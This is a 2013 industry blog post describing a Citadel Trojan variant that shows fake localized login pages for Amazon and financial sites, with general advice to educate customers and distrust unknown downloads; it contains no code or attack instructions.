CONTINUE TO SITE »
or wait 15 seconds

Blog

Think that site looks legit? Look again.

September 4, 2013 by Jim Ghiglieri — Senior Vice President, Corporate Communications, SHAZAM

A new variant of Citadel Trojan malware has surfaced in the last few weeks, and it's targeting not only financial institutions, but also social networks and e-commerce websites such as Amazon.

The malware is downloaded after credentials and other personal data, such as payment card information, are entered. It is believed the criminals are stockpiling this information for resale to other fraudsters.

The malware triggers when an infected computer browses to the target site. The target then delivers an HTML injection that looks like a legitimate log-on page. The screen contains localized content, automatically customized for the language of each market and brand being targeted.

The scam used by the injection page is a message claiming that there has been suspicious activity detected on an Amazon account, for example, and that the account has been blocked. Even the dropdown menus and warnings are localized with specific data elements for different geographies.

Clearly, these are not novices. The Citadel authors are apparently talented multi-linguists, having created scripts in Italian, Spanish, French and German. The group keeps a low profile and controls distribution carefully.

The enterprise has devoted a great deal of effort to protecting its stored stolen data and to ensuring the difficulty of researching its malware.

These hackers have gone beyond just purchasing a version of the Citadel malware. They've taken the necessary steps to convert it, make it sustainable, and localize it.

It's important to understand that despite high-profile botnet takedowns, Citadel and other malware families continue to be profitable and have longevity.

Now is a good time to amp up customer education regarding ongoing cyber threats. Remind your employees and customers to stay vigilant and exercise caution and skepticism if questionable pages crop up.

Because most victims are said to have been infected after downloading the malware, it's important to remind your employees and customers not to initiate downloads from sources they don't know.

Taking that a step further, they should even be suspicious of download prompts from sources they do know, as fraudsters are becoming particularly good at hijacking email addresses from representatives of trusted brands.

Read more about security.

About Jim Ghiglieri

None

Connect with Jim:

Related Media

Security
Examining biggest ATM security issues and 4 strategies to prevent them
Security
Banking privacy: 5 benefits for banks, customers
Security
Protecting an ATM's hardware, software by slowing down criminals
On-Demand Webinar
A Masterclass in ATM Security: Global Best Practices and Trends
Presented by Diebold Nixdorf
Recent Posts
Eurasian Bank selects Diebold Nixdorf's self-service software
First National Bank to open 30 branches
Romanian man arrested for alleged cash trapping ATM scheme
Replacing the ATM: Pros and cons of new vs. remanufactured
Chase partners with The Points Guy for Make-A-Wish sweepstakes


©2025 Networld Media Group, LLC. All rights reserved.
b'S1-NEW'